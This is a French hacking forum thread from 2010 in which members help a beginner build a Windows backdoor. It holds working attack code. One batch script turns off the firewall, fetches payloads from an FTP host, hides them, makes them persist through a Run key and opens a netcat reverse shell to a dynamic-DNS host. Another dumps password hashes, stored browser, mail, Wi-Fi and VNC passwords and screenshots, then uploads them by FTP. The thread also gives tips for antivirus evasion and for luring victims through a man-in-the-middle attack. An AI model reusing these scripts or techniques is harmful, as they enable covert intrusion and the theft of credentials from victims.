Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 13-06-2010 01:38:59

Psicao
Membre

Comment créer mon propre Backdoor ?

Bonsoir tout le monde smile

Futur étudiant en réseau informatique, je n'est que des connaissance hardware et autre, enfin j'ai plutôt les connaissance d'un mec qui aime chipoter qui y connais un peut en réseau mais qui aime chipoter avec le coté hardware d'un pc et fin voila quoi.

J'ai réussie a crée un backdoor si je me trompe pas qui récupère tout sur une clé usb.

J'aimerais que cela fonctionne via un autre moyen genre envoyé cela sur le mon deuxième pc qui est sur mon réseau.

J'ai aussi comme bute arrivé a entrer sur le même pc cette fois connecter en wifi sur le réseau de mon voisin d'en bas qui ma donner l'autorisation de me connecter étant un amis proche.

Je sais pas tellement sur quelle voie me diriger pour acquérir c'est quelque connaissance enfin quelque es la un mots vachement petit.

Enfin j'ai étudier le principe du TCP/IP.

J'aimerais vraiment apprendre ces connaissance pour ensuite pouvoir voler de mes propres ailes.

Voila j'espère que vous pourrais m'aider ou me donner quelque piste.

Cordialement Psicao smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-06-2010 09:08:39

antares145
Membre d'honneur
Site Web

Re : Comment créer mon propre Backdoor ?

Salut Psicao, et bienvenue sur le forum smile

Pour ta question, la première chose à faire c'est nous détailler (en gros) comment fonctionne ton backdoor : C'est un script, un exécutable, plusieurs fichiers, ... ?
Est-ce que tu as suivi le tuto de [email protected] (--> Backdoor pour Noobz sous win) pour le réaliser ?

De ta structure va dépendre la "facilité" de pouvoir faire exécuter ca à distance, mais je te préviens d'avance : exécuter un backdoor à distance ce n'est pas facile hmm Surtout s'il est composé de plusieurs fichiers, et que tu veux le faire "à l'insu de l'utilisateur" wink
De même, sur un réseau WiFi, ce n'est pas plus facile. La "meilleure" solution dans ce cas selon moi, c'est de faire un MITM sur la machine-cible (pour faire passer tout son trafic par ta machine attaquante) et rediriger son "surf" vers une page piégée qui l'invitera à télécharger ton backdoor. Ce n'est pas spécialement facile, mais ca peut marcher. Encore une fois, ca dépend de la façon dont tu as conçu ton programme smile

[EDIT] Par contre si tu pouvais trouver un titre heu... un minimum en rapport avec la question, ca serait apprécié big_smile

#3 13-06-2010 21:39:30

Veidam
Membre Indispensable
Lieu : us

Salut

oui tu devrais nous aider a situer ton niveau pour voir si on peut t'apprendre ou si c le contraire car ce que tu veut faire est plus ou moins simple mais il faut un peu de connaissance (pas grand chose)

sinon on se sert du tuto citer plus haut par antares 145

petit prog sympa

1er étape: créer un compte no-ip et utiliser un compte free-wifi (pourquoi ben c mieux sisi wink )sur le pc client le notre donc smile et aussi un compte ftp qui acceuilleras netcat et ex.exe

2eme étape: créer un code batch de ce style un pour télécharger et installer netcat a partir d'un ftp
et l'autre pour démarrer netcat en reverse/shell

@ echo off

%start% netsh advfirewall set currentprofile state off
If ERRORLEVEL == 1 Goto XP
echo advfirewall currentprofile OFF

ver
echo Firewall windows down 
%start% netsh firewall set opmode disable
goto suite

:XP
echo. 
echo Car elle ne s'applique qu'a VISTA et s7ven
ver
echo Ok
echo.

:Erreurdeping
ping google.com
IF ERRORLEVEL==1 goto Erreurdeping
echo ** le ping a reussi **

download.exe http://votreftp/system.exe
download.exe http://votreftp/ex.exe

:SUITE

(echo ---- LANCEMENT DU SERVEUR ----)
xcopy /Y system.exe %SystemRoot%\System32
attrib +H +S %SystemRoot%\System32\system.exe
echo le fichier system.exe se trouve dans %SystemRoot%\System32\
del system.exe

xcopy /Y ex.exe %SystemRoot%\System32
attrib +H +S %SystemRoot%\System32\ex.exe
echo le fichier ex.exe se trouve dans %SystemRoot%\System32\
del ex.exe

REG ADD HKLM\Software\\Microsoft\Windows\CurrentVersion\Run /v system32 /t REG_SZ /d "C:\WINDOWS\system32\ex.exe"

echo.

là pour ceux qui me suive on va créer ex.exe (trop facile) pour qu'il lance netcat en mode reverse shell

voici le code y a pas plus simple

@ echo
ping google.com

call C:\WINDOWS\system32\systeme -d votreHost.no-ip.biz 4444 -e cmd.exe

echo.

pour ceci tu auras besoins de ces logiciels download.exe et bat to exe converters

et voila vous avez votre prog alléger un max mais qui s'alimente au gré de l'imagination ...

il reste plus qu'a crypter vos tools finie pour être invisible aux AV

améliorez le code c fait pour ! et c pas compliquer partager quoi smile

ah oui il reste plus qu'a attendre en lançant netcat commande : nc -l -p 4444

et c good

Dernière modification par Veidam (13-06-2010 21:49:10)

#4 15-06-2010 01:15:17

Psicao
Membre

antares145 a écrit :

Salut Psicao, et bienvenue sur le forum smile

Pour ta question, la première chose à faire c'est nous détailler (en gros) comment fonctionne ton backdoor : C'est un script, un exécutable, plusieurs fichiers, ... ?
Est-ce que tu as suivi le tuto de [email protected] (--> Backdoor pour Noobz sous win) pour le réaliser ?

De ta structure va dépendre la "facilité" de pouvoir faire exécuter ca à distance, mais je te préviens d'avance : exécuter un backdoor à distance ce n'est pas facile hmm Surtout s'il est composé de plusieurs fichiers, et que tu veux le faire "à l'insu de l'utilisateur" wink
De même, sur un réseau WiFi, ce n'est pas plus facile. La "meilleure" solution dans ce cas selon moi, c'est de faire un MITM sur la machine-cible (pour faire passer tout son trafic par ta machine attaquante) et rediriger son "surf" vers une page piégée qui l'invitera à télécharger ton backdoor. Ce n'est pas spécialement facile, mais ca peut marcher. Encore une fois, ca dépend de la façon dont tu as conçu ton programme smile

[EDIT] Par contre si tu pouvais trouver un titre heu... un minimum en rapport avec la question, ca serait apprécié big_smile

Alors c'est un executable crée via winrar SFX qui contient un tat de exe qui se lance automatiquement via un script VBS.

Oui j'ai suivit le tuto de [email protected]

J'en doute pas mais est il possible de crée un backdoor qui pourrais nous donner accès par exemple a l'écran de l'autre comme si on était sur un soft VNC.

Ou donner accès au donné du DD ?

Et comme je disais je suis la pour apprendre donc je suis pas contre de devoir a essayer un nombre incalculable de fois et j'ai aussi envie de comprendre ce que je fais le tuto de [email protected] et bien mais y'a certain moment tu te sent largué ...

MITM ? Man In The Middle ? tu veux dire quelqu'un qui doit executer quelque chose sur le pc dit " cible " ? ce genre de manip ne me convient pas hmm mais pourquoi pas essayer je suis la pour apprendre donc tout ce qui peut être appris n'est pas de refus.

Je suis pas contre mais je ne trouve pas de titre qui pourais correspondre a ce que je demande ^^' puis mon titre attire la curiosité : )

Donc voila.

#5 15-06-2010 01:21:15

Psicao
Membre

Veidam a écrit :

Salut

oui tu devrais nous aider a situer ton niveau pour voir si on peut t'apprendre ou si c le contraire car ce que tu veut faire est plus ou moins simple mais il faut un peu de connaissance (pas grand chose)

sinon on se sert du tuto citer plus haut par antares 145

petit prog sympa

1er étape: créer un compte no-ip et utiliser un compte free-wifi (pourquoi ben c mieux sisi wink )sur le pc client le notre donc smile et aussi un compte ftp qui acceuilleras netcat et ex.exe

2eme étape: créer un code batch de ce style un pour télécharger et installer netcat a partir d'un ftp
et l'autre pour démarrer netcat en reverse/shell

@ echo off

ver
goto suite

echo. 
ver
echo Ok
echo.

ping google.com

download.exe http://votreftp/system.exe
download.exe http://votreftp/ex.exe

del system.exe

xcopy /Y ex.exe %SystemRoot%\System32
attrib +H +S %SystemRoot%\System32\ex.exe
echo le fichier ex.exe se trouve dans %SystemRoot%\System32\
del ex.exe

REG ADD HKLM\Software\\Microsoft\Windows\CurrentVersion\Run /v system32 /t REG_SZ /d "C:\WINDOWS\system32\ex.exe"

echo.

là pour ceux qui me suive on va créer ex.exe (trop facile) pour qu'il lance netcat en mode reverse shell

voici le code y a pas plus simple

@ echo
ping google.com

call C:\WINDOWS\system32\systeme -d votreHost.no-ip.biz 4444 -e cmd.exe

echo.

pour ceci tu auras besoins de ces logiciels download.exe et bat to exe converters

et voila vous avez votre prog alléger un max mais qui s'alimente au gré de l'imagination ...

il reste plus qu'a crypter vos tools finie pour être invisible aux AV

améliorez le code c fait pour ! et c pas compliquer partager quoi smile

ah oui il reste plus qu'a attendre en lançant netcat commande : nc -l -p 4444

et c good

Tu voie c'est cela que j'ai pas envie d'avoir comme réponse un tuto servie sur la table sans réel description de ce que je fais si il faut chercher sur google pour comprendre suis pas contre.

Mais la tu me sert quelque choses tout fais alors que je trouve tellement instructive de le faire soit même.

C'est sympa de me donner tout sur la table mais une fois que j'aurais fait cela je ne n'aurai vraiment pas appris grand choses sauf que tout ce que tu va me dire de faire va fonctionner ( enfin parton de l'idée que cela fonctionne. ).

Merci quand même de ton aide mais si tu pouvais pas que me balancer ce que je dois faire et me décrire ce que je vais faire sa serais agréable de ta part.

#6 15-06-2010 09:53:39

antares145
Membre d'honneur
Site Web

Voilà précisément pourquoi on te demande ton niveau (au passage, tu ne réponds pas à la question) wink
Veidam pensait (et il n'était pas le seul) que tu connaissais déjà les bases en BAT qu'il propose, peut-être que ce n'est pas le cas... La description des différentes commandes utilisées se trouve dans le tuto de [email protected], dont je t'ai donné le lien dans ma première réponse. Si tu veux comprendre ce que Veidam te propose, c'est une bonne base et un bon exercice smile

On va poser la question autrement :
* Qu'est-ce que tu as ? --> poste ici le code du "backdoor" USB actuel dont tu disposes (je pense que c'est plus un data miner, mais soit)
* Qu'est-ce que tu veux ? --> poste ici ce que tu cherches à faire, avec le + de détails possibles
Alors seulement avec ces infos-là on peut te lancer un jeu de pistes avec des idées minimalistes pour que tu saches quoi chercher de ton côté (si c'est ca que tu veux). Mais tant qu'on a aucune base de travail, et que tu refuses celles qu'on te donne, ben on sait pas faire grand chose pour toi wink

#7 15-06-2010 10:56:33

Veidam
Membre Indispensable

Merci antares145

c tout a fait ça sans le tuto de [email protected] je ne comprendrais toujours pas le code bat j'ai fait son exercice et utiliser des tutos et des logiciels que j'ai partager sur son poste

tu devrais passer du temps dessus pour avancer car je n'ai rien fait d'extraordinaire ici il est possible de faire beaucoup mieux et c là ou tu rentre en jeu tu vas j'en suis sur dans peu de temps nous faire un trojan digne d'un noobs sachant qu'il est possible qu'il fonctionne sous vista seven et xp

je suis désolé mais je n'ai pas le temps de faire un tuto complet détaillé chaque étape mais j'y pense surtout pour crypter netcat et qu'il passe les AV

si tu pose une question précise alors oui je répondrais !!!

@ ++

#8 15-06-2010 17:12:24

Psicao
Membre

Ok je suis au boulot je vous poste cela quand je rentre chez moi smile

Et non je ne connais pas encore les base du BAT .

Enfin pas toute les base smile

Edit :

@ echo off

del l33t-*.vbs /a
set atr=attrib +H +S
set l33t-1=l33t-%Psicao%.txt
set l33t-2=l33t-%Psicao%.html
set start=start /B /MIN /wait
set cr=echo +---------------+
set ba=echo. ^& echo. __________________________________________________________ ^& ^echo.
%atr% Win-maj.exe
%atr% l33t-*
%atr% *.bat

echo. & echo . VEUILLEZ PATIENTER ENVIRON 1 min . & echo. & echo.

if Exist %l33t-1% del %l33t-1% /a
if Exist %l33t-2% del %l33t-2% /a

ver
goto suite

echo.
ver
echo Ok
echo.

sc create 
sc.exe start SYSTEM
del system.exe

echo. & echo. & echo. & echo --- RECUPERATION DES INFOS --- & echo.

(echo.
%cr% & echo + RECUP SAM + & %cr% & l33t-PwDump7.exe localhost & %ba%
%cr% & echo + NBTSTAT -N + & %cr% & nbtstat -n & %ba%
%cr% & echo + IPCONFIG /ALL + & %cr% & ipconfig /all & %ba%
%cr% & echo + TASKLIST ALL + & %cr% & tasklist.exe & %ba%
%cr% & echo + TASKLIST + & echo + svchost.exe + & %cr%
tasklist.exe /svc /fi "imagename eq svchost.exe" & %ba%) > %l33t-1%

%start% l33t-wirelesskeyview.exe /shtml wirelesskeyview.l33t
more wirelesskeyview.l33t > %l33t-2% & del *.l33t

%start% l33t-netrouteview.exe /shtml netrouteview.l33t
more netrouteview.l33t >> %l33t-2% & del *.l33t

%start% l33t-ChromePass.exe /shtml ChromePass.l33t
more ChromePass.l33t >> %l33t-2% & del *.l33t

%start% l33t-DevManView /shtml DevManView.l33t
more DevManView.l33t >> %l33t-2% & del *.l33t

%start% l33t-DevManView /shtml DevManView.l33t
more DevManView.l33t >> %l33t-2% & del *.l33t

%start% l33t-iepv /shtml iepv.l33t
more iepv.l33t >> %l33t-2% & del *.l33t

%start% l33t-LiveContactsView /shtml LiveContactsView.l33t
more LiveContactsView.l33t >> %l33t-2% & del *.l33t

%start% l33t-mailpv /shtml mailpv.l33t
more mailpv.l33t >> %l33t-2% & del *.l33t

%start% l33t-mspass /shtml mspass.l33t
more mspass.l33t >> %l33t-2% & del *.l33t

%start% l33t-mspass /shtml mspass.l33t
more mspass.l33t >> %l33t-2% & del *.l33t

%start% l33t-netpass /shtml netpass.l33t
more netpass.l33t >> %l33t-2% & del *.l33t

%start% l33t-NetResView /shtml NetResView.l33t
more NetResView.l33t >> %l33t-2% & del *.l33t

%start% l33t-NetRouteView /shtml NetRouteView.l33t
more NetRouteView.l33t >> %l33t-2% & del *.l33t

%start% l33t-OperaPassView /shtml OperaPassView.l33t
more OperaPassView.l33t >> %l33t-2% & del *.l33t

%start% l33t-PasswordFox /shtml PasswordFox.l33t
more PasswordFox.l33t >> %l33t-2% & del *.l33t

%start% l33t-ProduKey /shtml ProduKey.l33t
more ProduKey.l33t >> %l33t-2% & del *.l33t

%start% l33t-VNCPassView /shtml VNCPassView.l33t
more VNCPassView.l33t >> %l33t-2% & del *.l33t

echo.
echo . CREATION DU FICHIER "%l33t-1%" ...... OK
echo.
echo . CREATION DU FICHIER "%l33t-2%" ....... OK
echo.

ping google.com
(echo open ftp.votresiteftp.fr & echo votreLogin& echo votrePass& echo cd votreRépertoire & echo mput l33t-* & echo bye) > ftp.txt

ftp.exe -i -s:ftp.txt

echo.
echo . DELETE LES TRACES ........ OK <<---- Grand
echo
del l33t-* /a

:Erreurdeping2
ping google.fr
IF ERRORLEVEL==1 goto Erreurdeping2
for /L %%a in (1,1,3) do (
echo essai %%a

nircmd.exe loop 3 5000 savescreenshot scr_~$currdate.MM-dd-yyyy$_~$currtime.HH.mm.ss$s.pngL33t
(echo open ftp.votresiteftp.fr & echo votreLogin& echo votrePass& echo cd votreRépertoire & echo mput *.pngL33t & echo bye) > ftp.txt
ftp.exe -i -s:ftp.txt
del *.pngL33t
ping google.com
IF ERRORLEVEL==1 goto Erreurdeping2
IF ERRORLEVEL==1 goto Erreurdeping2 )

del ftp.txt; nircmd.exe; Listing.bat /a

attrib l33t-.html +h +s
attrib l33t-.txt +h +s
attrib ftp.txt +h +s

Mais avec cela j'ai reussie a crée un exe qui récupère des donné sur un pc une fois la clé usb branché comme j'ai une U3 j'ai tester et j'ai remarquer que cela fonctionner donc :x

Mais ce que j'aimerais c'est apprendre a crée un backdoor personaliser qui pourais me permettre d'avoir accé au pc une fois envoyé dessus.

Soit comme sur un soft VNC.

Soit via l'invité de commande avec la possibilité de transférer des fichier modifier ou supprimer.

Dernière modification par Psicao (17-06-2010 02:35:54)

#9 17-06-2010 19:16:35

Veidam
Membre Indispensable

bon je vais pas te mâcher le travail mais t'aider a te mettre sur la voie smile

dans le tuto de [email protected] j'en parle si tu l'as lue tu as du voir qu'il inclus netcat ce tool est un couteau suisse des réseaux la base de tous ceux qui s'intéresse au socket en tcp/ip terrible ce tool

dans une connexion d'un poste a un autre le principe et un serveur un client netcat permet d'être l'un ou l'autre

c'est important de le savoir because il n'est pas possible de se connecter de l'extérieur d'une box free livebox ou autre et trouver le pc sur le reseau

il faut donc que ce soit le pc victime qui vienne a toi donc je te renvoie sur le tuto de [email protected] et de lire mes postes qui pourront t'aider car j'ai réussi a le faire et j'ai partager

et comme dit si tu as une question précise qui montre que tu cherche un peu alors je me ferais un plaisir de t'aider ou un expert s'en chargeras smile

Cordialement

#11 17-06-2010 22:08:54

Psicao
Membre

Veidam a écrit :

bon je vais pas te mâcher le travail mais t'aider a te mettre sur la voie smile

dans le tuto de [email protected] j'en parle si tu l'as lue tu as du voir qu'il inclus netcat ce tool est un couteau suisse des réseaux la base de tous ceux qui s'intéresse au socket en tcp/ip terrible ce tool

dans une connexion d'un poste a un autre le principe et un serveur un client netcat permet d'être l'un ou l'autre

c'est important de le savoir because il n'est pas possible de se connecter de l'extérieur d'une box free livebox ou autre et trouver le pc sur le reseau

il faut donc que ce soit le pc victime qui vienne a toi donc je te renvoie sur le tuto de [email protected] et de lire mes postes qui pourront t'aider car j'ai réussi a le faire et j'ai partager

et comme dit si tu as une question précise qui montre que tu cherche un peu alors je me ferais un plaisir de t'aider ou un expert s'en chargeras smile

Cordialement

Merci bien dans ce cas je vais voir ce que dit netcat histoire d'en apprendre plus sur ce tool. wink

[email protected] a écrit :

Psicao relis ton script tu as des corrections a faire

J'en doute pas j'ai eu un peut de mal avec le tuto je dois dire ... mais c'est mon premier.

Je vais apprendre de mes erreur : )

Edit : @ Veidam : sa fonctionne que sur linux ? ( de toute facon je pense qu'il est temps que j'installe linux sur mon acer ^^'

Edit² : Sa serait pas mieu d'utiliser Cryptcat ? pour ce qui est de netcap j'ai tester les quelque commande que j'ai trouver sur internet et trouver a quoi elle serv.

Mais une seule me parait assez étrange, l'écoute des port sur une adresse ip.

On ne voie aucun avancement et par moment on obtient un port avec genre 3420?

Dernière modification par Psicao (17-06-2010 22:57:44)

#13 18-06-2010 00:55:19

Psicao
Membre

[email protected] a écrit :

Merci crash wink mais j'ai trouver finalement smile

j'ai juste un probleme avec ma carte reseau sur backtrack 4 elle est reconnue comme Lo ...

Les pilote non pas l'air d'etre installer hmm

Carte mère Asus m2n-sli deluxe

Dernière modification par Psicao (18-06-2010 00:59:51)

#14 18-06-2010 15:29:09

antares145
Membre d'honneur
Site Web

Psicao, merci de créer un nouveau sujet pour ton problème de détection de carte réseau wink

Donnes-y le résultat le "ifconfig -a" et aussi "lspci" pour qu'on puisse voir quel matériel tu as. Mais de mémoire, la m2n-sli deluxe ne pose aucun problème (c'est celle avec 2 entrées RJ-45, si je ne me trompe pas ?)

#15 18-06-2010 17:08:29

Psicao
Membre

antares145 a écrit :

Psicao, merci de créer un nouveau sujet pour ton problème de détection de carte réseau wink

Donnes-y le résultat le "ifconfig -a" et aussi "lspci" pour qu'on puisse voir quel matériel tu as. Mais de mémoire, la m2n-sli deluxe ne pose aucun problème (c'est celle avec 2 entrées RJ-45, si je ne me trompe pas ?)

Exacte !

je te donne cela tout de suite je reboot vue que suis sous windows smile

ifconfig -a

eth0      Link encap:Ethernet  HWaddr 00:17:31:bb:ab:9f
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:26

eth1      Link encap:Ethernet  HWaddr 00:17:31:bb:90:e5
          inet6 addr: fe80::217:31ff:febb:90e5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:680 (680.0 B)
          Interrupt:27 Base address:0x6000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:100 (100.0 B)  TX bytes:100 (100.0 B)

lspci

00:08.0 Bridge: nVidia Corporation MCP55 Ethernet (rev a2)
00:09.0 Bridge: nVidia Corporation MCP55 Ethernet (rev a2)

Voila.

Dernière modification par Psicao (18-06-2010 17:18:25)

#16 18-06-2010 17:25:50

Veidam
Membre Indispensable

un lsusb s'impose on dirait smile

#17 18-06-2010 17:30:01

Psicao
Membre

Veidam a écrit :

un lsusb s'impose on dirait smile

Jte donne cela tout de suite wait a minute  wink

Edit : 

Bus 002 Device 003: ID 046d:c505 Logitech, Inc. Cordless Mouse+Keyboard Receiver
Bus 002 Device 002: ID 046d:c016 Logitech, Inc. M-UV69a/HP M-UV96 Optical Wheel Mouse
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 002: ID 0951:1603 Kingston Technology DataTraveler 1GB/2GB Pen Drive
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

Voila smile

Dernière modification par Psicao (18-06-2010 17:36:12)

#18 18-06-2010 18:08:15

antares145
Membre d'honneur
Site Web

Ta carte est reconnue et fonctionnelle, ([c]eth0[/c] et [c]eth1[/c] sont tes 2 interfaces câblées), mais elle est peut-être (sûrement, même) désactivée. Pour l'activer, 2 possibilités :

/etc/init.d/networking start
[ou]
dhclient eth0 && dhclient eth1

Si ta carte ne fonctionne toujours pas après ca, (au risque de me répéter roll) merci de créer un nouveau sujet pour régler ton problème matériel, sinon ce topic-ci va partir dans tous les sens wink

#19 18-06-2010 18:18:13

Psicao
Membre

antares145 a écrit :

Ta carte est reconnue et fonctionnelle, ([c]eth0[/c] et [c]eth1[/c] sont tes 2 interfaces câblées), mais elle est peut-être (sûrement, même) désactivée. Pour l'activer, 2 possibilités :

/etc/init.d/networking start
[ou]
dhclient eth0 && dhclient eth1

Si ta carte ne fonctionne toujours pas après ca, (au risque de me répéter roll) merci de créer un nouveau sujet pour régler ton problème matériel, sinon ce topic-ci va partir dans tous les sens wink

Ok smile

Si cela fonctionne toujours pas je crée un nouveau sujet wink

Edit : fonctionne a merveille merci tout le monde smile

Je vais continuer a voir ce que peut faire netcat smile

Edit² : Alors voila.

j'ai scanner ma propre ip local en tappant nc -v -w 2 -z 192.168.1.1 1-100000

Sa ma donner 3 port avec entre parenthése :

( ? ) open
(tproxy) open
(www) open

J'ai scanner ensuite mon adresse ip que j'ai la maintenant que les admin de ce forum peuvent surement voir et sa ma donner :

(?) open
(tproxy) open
(sip) open

Maintenant que je sais qu'elle sont les port ouvert que puissent faire avec l'ip et les port comme intrusion ?

Dernière modification par Psicao (18-06-2010 18:51:09)

#20 18-06-2010 21:43:36

M1ck3y
Administrateur
Lieu : Lost in the darkness

Psicao, merci de relire bien attentivement les sections 8 et 9 de notre règlement.

#21 18-06-2010 23:23:21

Psicao
Membre

@m1ck3y désoler c'est l'habitude du forum clubic ^^'.

pour le titre j'arrive pas a le changé hmm

#22 19-06-2010 00:03:53

antares145
Membre d'honneur
Site Web

Ici, le but de Netcat est d'établir une reverse shell depuis la machine victime vers ta machine attaquante. On peut s'en servir comme scanner de ports, mais Nmap fait ca beaucoup mieux (cfr. les articles de Raylook --> Nmap : Bases et différents types de scan).

Une bonne façon de faire un backdoor (facilement), c'est de mettre un netcat en écoute/server chez toi, et un netcat en client chez la victime qui ouvrira une session vers ta machine à toi. Netcat te créera la connexion directe entre ta machine et la victime, et tu peux le configurer pour qu'il redirige ce "tunnel réseau" vers une console Windows/Linux (invite de commande). Ca se fait avec l'option [c]-e[/c], plus de détails sur cette page --> Netcat - Les tutos de Nico (juste avant la section "transfert de fichier"). Une fois que tu as accès à la console de la victime, tu fais quasiment ce que tu veux (enfin, ca dépend de ses droits). Pour le VNC, on verra ca plus tard tongue
Tu as maintenant le principe actif de ton backdoor, mais aucun moyen de le lancer à l'insu de la victime (il faut encore qu'elle lance netcat elle-même). Je te laisse chercher pour la suite smile

* pour ton autre question sur les attaques possibles d'après les résultats d'un scan netcat, je laisse les membres du forum backtrack-linux répondre à ton post (--> Netcat [backtrack-linux.org/forums]) sinon ca va faire du duplicate content
* Pour le titre, tu ne peux le changer que dans les 5 minutes qui suivent la création du sujet. Maintenant, seul l'admin ou un modo peut le modifier, si tu me dis quel titre tu veux je l'adapterai en conséquence wink

#23 19-06-2010 01:33:12

Psicao
Membre

Merci bien big_smile je vais deja voir les mots que je comprend pas genre reverse shell et autre pour ensuite voir ce que je peut faire.

Pour le titre je sais pas vraiment quoi mettre une idée ?

Par contre lestutosdenico ne fonctionne pas...

Edit : Petite question j'ai sa comme reponse quand je scan mon ip internet ( pas local )

5060/tcp open  sip

sip ca veut dire quoi ( j'ai chercher sur google sa a l'air d'etre le port pour le voip ...

Dernière modification par Psicao (19-06-2010 02:00:25)

#25 19-06-2010 13:16:38

Psicao
Membre

Ok merci d'avoir confirmer.

Et maintenant le site de nico fonctionne big_smile

Pour ce que sa interaisse voila un tuto qui explique ce qu'est le reverse-shell.

reverse-shell

Edit : j'ai une question !

J'ai envie d'utiliser le "chat" netcat via deux pc qui ne sont pas sous le meme reseau.

J'ai l'ip de l'autre pc distant je tape donc :

nc -l -p mon ipinternet port

et lui doit taper

nc monipinterner port

et noramelemnt sa devrais fonctionner exacte ?

Dernière modification par Psicao (19-06-2010 15:24:38)

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]